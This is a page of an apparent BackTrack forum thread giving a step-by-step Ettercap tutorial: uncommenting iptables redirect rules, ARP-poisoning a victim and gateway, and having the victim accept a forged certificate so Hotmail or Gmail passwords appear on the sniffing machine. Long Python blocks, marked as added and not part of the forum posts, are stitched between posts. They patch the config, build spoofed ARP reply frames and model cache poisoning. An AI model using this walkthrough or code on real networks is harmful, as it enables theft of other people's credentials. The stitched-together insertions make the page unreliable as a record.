Page 6 of 25
Results 51 to 60 of 248

Thread: Sniffing Tutorial:

  1. #51
    Junior Member
    Join Date
    Mar 2007
    Posts
    26

    Default

    Quote Originally Posted by yeehaw View Post
    Simple Sniffing Tutorial

    Tools:

    Ettercap
    nano

    1. For SSL Dissection support (hotmail,gmail), you need to do this:
    Open a shell and type "nano /usr/local/etc/etter.conf". Use the down arrow until you reach "redir_command_on/off", look at the Linux part; you're going to need to uncomment:
    Code:
    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    to:

    Code:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    After you're done, press F2, Y, Return.

    Now boot Ettercap: Menu --> Backtrack --> Spoofing --> Ettercap
    Go to: Sniff --> Unified Sniffing -->ethX(what interface you want to sniff).
    Then Press: Ctrl+S to scan hosts.
    Then Go to: Mitm --> ARP poisoning, select sniff remote connections, and press ok.
    Then Go to: Start --> Start Sniffing.

    For example, walk to another PC, go to your internet email account (Hotmail, Gmail) and log in. You will be asked to trust the certificate; trust it, and watch your sniffing computer: the username and password should appear.

    When you're done, go to Start --> Stop Sniffing, and go to Mitm --> Stop mitm attack(s).

    Yeehaw

    I'm using BT 2 Final. Where can I find the "nano /usr/local/etc/etter.conf" file? Typing it in the command prompt does not work for BT 2 Final. I looked for it in the system files but was unable to find it. I got to the etc folder but there is no etter.conf file. I hate asking so many questions and not giving back as many answers. Thanks for the help guys.
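
    What the etter.conf edit quoted above actually does, as an added example (this is not code from the tutorial or from the Ettercap project): Ettercap reads redir_command_on/off, expands the %iface, %port and %rport placeholders at run time and runs the result, so uncommenting the iptables pair is what makes intercepted HTTPS connections get redirected to its local SSL dissector. The config text below is a constructed excerpt modelled on the quoted lines, and the interface name eth0 and redirect port 8080 are assumptions (Ettercap picks the real rport itself).

```python
"""Added example (not from the original post): what the etter.conf edit does.

Ettercap expands %iface, %port and %rport in redir_command_on/off and runs
the result.  Below: a function that uncomments exactly the two iptables
lines in a copy of that config, one that lists the active commands, and one
that renders a command the way Ettercap would, so the rule that actually
lands in the nat table is visible.
"""
import re

# Constructed sample of the relevant part of etter.conf (Linux section),
# mirroring the lines quoted in the tutorial.  Not the real shipped file.
ETTER_CONF_SAMPLE = """\
[privs]
ec_uid = 65534
ec_gid = 65534

[dissectors]
https = 443

#---------------
#     Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
"""

# Matches only a commented-out redir_command_* line whose value is an
# iptables command; the '# if you use iptables:' remark does not match.
REDIR_RE = re.compile(r'^#(redir_command_(?:on|off)\s*=\s*"iptables .*")\s*$')


def enable_iptables_redir(conf_text: str) -> str:
    """Return conf_text with the two iptables redir_command lines uncommented.

    The explanatory comment and the ipchains alternatives stay commented, so
    the file ends up with exactly one active redir_command_on and one
    redir_command_off, which is what Ettercap expects.
    """
    out = []
    for line in conf_text.splitlines():
        m = REDIR_RE.match(line)
        out.append(m.group(1) if m else line)
    return "\n".join(out) + "\n"


def active_redir_commands(conf_text: str) -> dict:
    """Map the uncommented redir_command_* keys to their command templates."""
    cmds = {}
    for line in conf_text.splitlines():
        m = re.match(r'^(redir_command_(?:on|off))\s*=\s*"(.*)"\s*$', line)
        if m:
            cmds[m.group(1)] = m.group(2)
    return cmds


def render_redir(template: str, iface: str, port: int, rport: int) -> str:
    """Expand Ettercap's %iface/%port/%rport placeholders into a real command."""
    return (template.replace("%iface", iface)
                    .replace("%port", str(port))
                    .replace("%rport", str(rport)))


if __name__ == "__main__":
    patched = enable_iptables_redir(ETTER_CONF_SAMPLE)
    cmds = active_redir_commands(patched)
    # eth0 and 8080 are assumptions for illustration: victim traffic to
    # port 443 is pulled into Ettercap's local listener on the chosen rport.
    print(render_redir(cmds["redir_command_on"], "eth0", 443, 8080))
    print(render_redir(cmds["redir_command_off"], "eth0", 443, 8080))
```

    The rendered rule is the reason the victim gets a certificate prompt: the victim's TCP connection to port 443 never reaches the real server directly, it terminates on the sniffing box, which presents its own certificate.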

  2. #52
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15

    Default

    Quote Originally Posted by ghost8786 View Post
    I'm using BT 2 Final. Where can I find the "nano /usr/local/etc/etter.conf" file? Typing it in the command prompt does not work for BT 2 Final. I looked for it in the system files but was unable to find it. I got to the etc folder but there is no etter.conf file. I hate asking so many questions and not giving back as many answers. Thanks for the help guys.

    works like a charm over here...

  3. #53
    Junior Member
    Join Date
    Mar 2007
    Posts
    26

    Default

    Quote Originally Posted by yeehaw View Post
    works like a charm over here...
    Yeah, I finally found it, after searching for quite some time. Although my Ettercap crashes as soon as I click on the interface to use.

  4. #54
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15

    Default

    Quote Originally Posted by ghost8786 View Post
    Yeah, I finally found it, after searching for quite some time. Although my Ettercap crashes as soon as I click on the interface to use.
    That's weird, did you check the MD5 of the ISO?

  5. #55
    Junior Member
    Join Date
    Mar 2007
    Posts
    26

    Default

    Ummm... how would I go about checking the MD5? I know it's that string of letters and numbers that was listed below the link to download BT, but that's the extent of my knowledge about it.

  6. #56
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15

    Default

    Download this: http://www.fourmilab.ch/md5/md5.zip

    Put md5.exe in the same directory as bt2final.iso.

    Then open a console, go to the directory where bt2final.iso is, and type:

    md5 bt2final.iso

    It should be: 990940d975f13d8418b0daa175560ae0

    Yeehaw
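
    The same check the reply above describes, as an added example (not from the post or from the fourmilab tool): hash the ISO in chunks rather than reading the whole image into memory, and compare against the published value in constant time. The expected digest is the one quoted in the thread for bt2final.iso; the file written by verify_sample() is constructed for demonstration and is not the ISO.

```python
"""Added example (not from the original post): verify a download's MD5 against
a published digest, streaming the file in 1 MiB chunks and comparing in
constant time.  The bt2final.iso digest is the one quoted in the thread; the
sample file created below is constructed and will not match it.
"""
import hashlib
import hmac
import os
import tempfile

BT2FINAL_MD5 = "990940d975f13d8418b0daa175560ae0"  # as posted in the thread


def file_md5(path: str, chunk_size: int = 1 << 20) -> str:
    """Hex MD5 of a file, read in chunks so a multi-hundred-MB ISO is fine."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_md5(path: str, expected_hex: str) -> bool:
    """True if the file's MD5 equals expected_hex (whitespace/case tolerant)."""
    actual = file_md5(path)
    # compare_digest avoids a timing side channel.  Unnecessary for a local
    # file check, but the right habit anywhere a digest or secret is compared.
    return hmac.compare_digest(actual, expected_hex.strip().lower())


def verify_sample() -> tuple:
    """Write a constructed file, check it against its own digest (True) and
    against the published bt2final.iso digest (False)."""
    data = b"not the real iso, just constructed bytes\n" * 1000
    fd, path = tempfile.mkstemp(suffix=".iso")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        good = verify_md5(path, hashlib.md5(data).hexdigest())
        bad = verify_md5(path, BT2FINAL_MD5)
    finally:
        os.unlink(path)
    return good, bad


if __name__ == "__main__":
    print(verify_sample())
```

    A mismatch tells you the image is corrupt, which would explain a tool that dies on start. A match only proves the copy is intact: MD5 is not collision-resistant, so it does not prove the image is the one the project published unless the digest itself came from a trusted source.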

  7. #57
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    4

    Post

    Great tut.... Thanks.

  8. #58
    Just burned his ISO
    Join Date
    Sep 2006
    Posts
    18

    Default

    Is it possible that there is no pop-up to accept the certificate at the PC which is checking emails etc.? :>

  9. #59
    coool
    Guest

    Default

    Thanks for this topic.

    But the password gets the same MD5. I'm searching for ettercap; they say people use the filters.

    Can you explain how to use filters with ettercap?

    Sorry, my language is bad.

  10. #60
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    7

    Default

    Quote Originally Posted by akuma6099 View Post
    I've read all 5 pages of this post and it seems like most of you are new to sniffing and spoofing. It's quite simple yet complex, I guess. I too was a noob; even with a wealth of knowledge I will always feel like a noob. There's always something you don't know.

    A sniffer sniffs traffic.
    A spoofer spoofs/tricks MAC identities (ARP).

    With a basic hub, you usually can sniff traffic without spoofing. The reasoning is that a hub doesn't know or care about who's connected. All a hub wants to do is move packets around ports. Very basic. Yes, this is a very dumbed-down version. So a hub can be sniffed without ARP spoofing/poisoning (mostly).

    A router or switch on the other hand is different. They have internal components that keep track of the physically connected devices. Not all switches do this but almost all routers do. A router knows based on the packet's header that 192.168.1.100 is located at port 1, therefore it is added to the CAM table. Every packet that is destined for 192.168.1.100 will be sent to port 1 based on the CAM table, A.K.A. Content Addressable Memory. Please look this up as it will unboggle your mind.

    That being said, now you can see that if you are 192.168.1.102 and you want to see a packet from 192.168.1.101, you cannot just sniff the network. You must in some way influence that packet to your physical port. Can you guess how we do that??? That's right, about 60,000 posts later and a proggy gets made. We will use Arpspoof or ettercap to deform the ARP cache of your target. In this case 192.168.1.101. ARP works based on IP-MAC combos.

    IP:192.168.1.102 MAC: 00:11:22:33:44:55 US!
    IP:192.168.1.101 MAC: 00:11:22:33:44:66 THEM!
    IP:192.168.1.1 GATEWAY(Out to Internet)

    When 192.168.1.101 wants to send something to 192.168.1.105, it looks in its ARP table. If that IP-MAC combo is in the table then it will send the packet accordingly. If not, it will send an ARP request (who has 192.168.1.105?).

    So the theory of spoofing is that I need to tell 192.168.1.101 that I have address 192.168.1.105. So we beat the ARP packet to the punch. When you ARP spoof, you send TONS of ARP packets saying I AM 192.168.1.105 with MAC 00:11:22:33:44:55. As you can see, that MAC is OURS. Now 192.168.1.101's ARP table contains that combo. When 192.168.1.101 sends a packet to 192.168.1.105, the packet's header will contain OUR MAC. Therefore the router/switch will send it to whoever has that MAC.

    You're probably wondering why I put 192.168.1.1 as a gateway in the list. Well, I'll tell ya. If you're browsing the internet then your packets must go through the gateway. Now put 2 and 2 together. Spoof THEM as target 1 and GATEWAY as target 2. Now you'll see everything that is destined for the internet/not your local network. That's why there's a target 1 and a target 2. Doesn't matter about direction.

    Target 1's packets will have a spoofed MAC in the ARP table as will target 2. That spoofed MAC will be YOURS and you will be forwarding every packet after you make a copy first. Your box will be turned into a packet forwarder.


    Well, it's been fun and I forgot what you posted about ettercap/arpspoof. I hope this sums it up in a VERY basic and concise way. There is a lot more to it; it's up to you to research. Thank you for playing.
    Peace.

    P.S. I love BackTrack. Even though I have 3 posts, I've been using it for over a year. I miss the old site forum. Had more posts in there. So, thank you to Mutts and all. I will enjoy this distro for the years to come.
    Awesome!!!!
    That... is an explanation!

    I have a question though....
    you are saying "We will use Arpspoof or ettercap to deform the ARP cache of your target."

    Correct me if I am wrong....
    In this way we will damage the ARP cache of our targets.
    If we try to arpspoof a big network then all the PCs which are connected to the same switch will have a damaged ARP cache. So the network will be unavailable after a while... the targets will have to reboot to fix their ARP cache.
    If we have a bigger network with 5 switches and we have connected BT2 to the first switch on port 1, can we arpspoof all the PCs, even if they are connected to the third and fourth switch?
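
    The poisoning described in the quoted explanation, worked at the byte level as an added example (not code from the post, from ettercap or from arpspoof): it builds the spoofed ARP replies an attacker at 192.168.1.102 sends to the victim at .101 (target 1) and to the gateway at .1 (target 2), applies them to a model of each host's ARP cache, and then runs the check a defender or a tool like arpwatch performs, flagging any IP whose MAC binding changed. The IPs and the attacker/victim MACs are the ones in the post; the gateway MAC 00:11:22:33:44:01 is an assumption. Nothing is sent; the frames are only constructed and parsed.

```python
"""Added example (not from the original post): ARP cache poisoning of
target 1 (victim) and target 2 (gateway) modelled offline at the frame level,
plus the IP-to-MAC flip check that detects it.  Addresses follow the post;
the gateway MAC is an assumption.  No packets are transmitted.
"""
import struct
from ipaddress import ip_address

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

US = ("192.168.1.102", "00:11:22:33:44:55")      # attacker, from the post
THEM = ("192.168.1.101", "00:11:22:33:44:66")    # victim (target 1), from the post
GATEWAY = ("192.168.1.1", "00:11:22:33:44:01")   # target 2; MAC assumed


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_arp(op: int, sender_ip: str, sender_mac: str,
              target_ip: str, target_mac: str) -> bytes:
    """Ethernet II frame carrying an ARP packet (RFC 826 field order)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # htype, ptype, hlen, plen, op
    arp += mac_bytes(sender_mac) + ip_address(sender_ip).packed
    arp += mac_bytes(target_mac) + ip_address(target_ip).packed
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet+ARP frame; raises ValueError if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(ip_address(frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": str(ip_address(frame[38:42])),
    }


def poison_frames(attacker, target1, target2) -> list:
    """The two spoofed replies a target1/target2 MITM keeps repeating:
    tell target1 that target2's IP lives at the attacker's MAC, and tell
    target2 that target1's IP lives at the attacker's MAC.  Both directions
    then flow through the attacker, who must forward them to stay unnoticed."""
    a_mac = attacker[1]
    return [
        build_arp(ARP_REPLY, target2[0], a_mac, target1[0], target1[1]),
        build_arp(ARP_REPLY, target1[0], a_mac, target2[0], target2[1]),
    ]


def apply_to_cache(cache: dict, frame: bytes) -> dict:
    """Model of a host that accepts unsolicited replies (classic ARP behaviour)."""
    p = parse_arp(frame)
    if p["op"] == ARP_REPLY:
        cache[p["sender_ip"]] = p["sender_mac"]
    return cache


def detect_mac_flips(before: dict, after: dict) -> list:
    """Defender's check: IPs whose MAC changed, which is what arpwatch-style
    monitoring alerts on.  Returns (ip, old_mac, new_mac) tuples."""
    return [(ip, before[ip], after[ip]) for ip in before
            if ip in after and before[ip] != after[ip]]


def demo() -> dict:
    victim_cache = {GATEWAY[0]: GATEWAY[1]}   # victim already knows the real gateway
    gateway_cache = {THEM[0]: THEM[1]}        # gateway already knows the real victim
    before_v, before_g = dict(victim_cache), dict(gateway_cache)
    to_victim, to_gateway = poison_frames(US, THEM, GATEWAY)
    apply_to_cache(victim_cache, to_victim)
    apply_to_cache(gateway_cache, to_gateway)
    return {
        "victim_cache": victim_cache,
        "gateway_cache": gateway_cache,
        "alerts": detect_mac_flips(before_v, victim_cache)
                  + detect_mac_flips(before_g, gateway_cache),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

    After demo() both caches point the other party's IP at 00:11:22:33:44:55, which is exactly why the attacking box has to forward packets (L190 in the quoted post): with forwarding off, the victim and gateway simply lose each other. The alerts list is the signal a switch feature like dynamic ARP inspection, or a host running arpwatch, acts on.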
